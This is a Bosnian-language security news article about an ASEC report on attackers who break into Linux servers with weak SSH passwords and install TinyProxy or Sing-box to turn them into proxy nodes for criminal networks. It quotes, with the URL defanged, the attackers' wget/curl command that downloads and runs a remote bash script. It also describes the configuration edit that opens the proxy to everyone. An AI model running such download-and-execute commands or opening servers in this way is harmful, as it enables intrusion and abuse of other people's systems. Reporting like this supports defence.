Kibernetički kriminalci pojačali su svoje napade na loše upravljane Linux SSH servere, koristeći sofisticirane proxy alate za uspostavljanje prikrivene mrežne infrastrukture. Ovi napadi predstavljaju odmak od tradicionalnog uvođenja zlonamjernog softvera ka strateškom instaliranju legitimnih mrežnih alata u zlonamjerne svrhe. Kampanja cilja na Linux servere sa slabim SSH akreditivima, iskorištavajući neadekvatne sigurnosne konfiguracije za dobijanje neovlašćenog pristupa. Za razliku od uobičajenih napada usmjerenih na rudarenje kriptovaluta ili operacije uskraćivanja usluge (DDoS), ove upade specifično ciljaju transformaciju kompromitovanih sistema u proxy čvorove unutar kriminalnih mreža.
Istraživači iz ASEC-a identificirali su dva primarna obrasca napada koji uključuju instaliranje TinyProxy i Sing-box proxy alata. Napadi pokazuju taktičku preciznost, bez uvođenja dodatnog zlonamjernog softvera izvan osnovne proxy infrastrukture, što sugerira organizovane operacije fokusirane na izgradnju skalabilnih proxy mreža. Sofisticirana priroda ovih napada ukazuje na koordinirane napore aktera prijetnje koji žele unovčiti kompromitiranu infrastrukturu putem ponuda “proxy-as-a-service” ili omogućiti anonimnost za naknadne kriminalne aktivnosti.
Mehanizam infekcije i taktika uvođenja započinju tako što napadači izvršavaju zlonamjernu bash skriptu koja sadrži komentare na poljskom jeziku, preuzetoj putem komande: `(wget -O s.sh hxxps://0x0[.]st/8VDs.sh || curl -o s.sh hxxps://0x0[.]st/8VDs.sh) && chmod +x s.sh && sh s.sh`. Skripta automatski detektuje operativni sistem i instalira TinyProxy koristeći odgovarajuće upravitelje paketa, uključujući apt, yum ili dnf. Ključno za uspjeh napada je manipulacija kontrolama pristupa TinyProxy. Zlonamjerni softver uklanja postojeće `Allow` i `Deny` pravila iz `/etc/tinyproxy/tinyproxy.conf`, zamjenjujući ih sa `Allow 0.0.0.0/0`, čime se efektivno dozvoljava neograničen eksterni pristup putem porta 8888. Varijanta Sing-box koristi skripte za instalaciju hostovane na GitHubu, uvodeći višenamjenski proxy koji podržava protokole vmess-argo, vless-reality, Hysteria2 i TUICv5, izvorno dizajniran za zaobilaženje geografskih ograničenja sadržaja, ali je prenamijenjen za kriminalne proxy mreže.
Ovaj obrazac napada, koji je objavljen na sajtu ASEC-a, naglašava rastući trend zloupotrebe legitimnih mrežnih alata od strane kibernetičkih kriminalaca. Umjesto da se fokusiraju na tradicionalno širenje zlonamjernog softvera, oni sada uspostavljaju sofisticirane proxy mreže kako bi prikrili svoju aktivnost ili ponudili te usluge drugima. Naime, napadači iskorištavaju slabosti u SSH sigurnosti, često uzrokovane jednostavnim lozinkama ili zastarjelim konfiguracijama, da bi dobili neovlašteni pristup Linux serverima. Nakon proboja, koristeći automatizovane skripte koje ciljaju na razne menadžere paketa, instaliraju alate poput TinyProxy ili Sing-box. Ključni korak u njihovoj strategiji je modificiranje konfiguracijskih datoteka kako bi omogućili neograničen pristup, pretvarajući tako server žrtve u javni proxy. Ovo im omogućava da usmjeravaju saobraćaj preko kompromitovanih sistema, skrivajući tako svoje IP adrese prilikom obavljanja drugih ilegalnih aktivnosti, poput distribucije zlonamjernog softvera ili učešća u DDoS napadima, ili da ovu infrastrukturu ponude kao uslugu drugim kriminalcima.
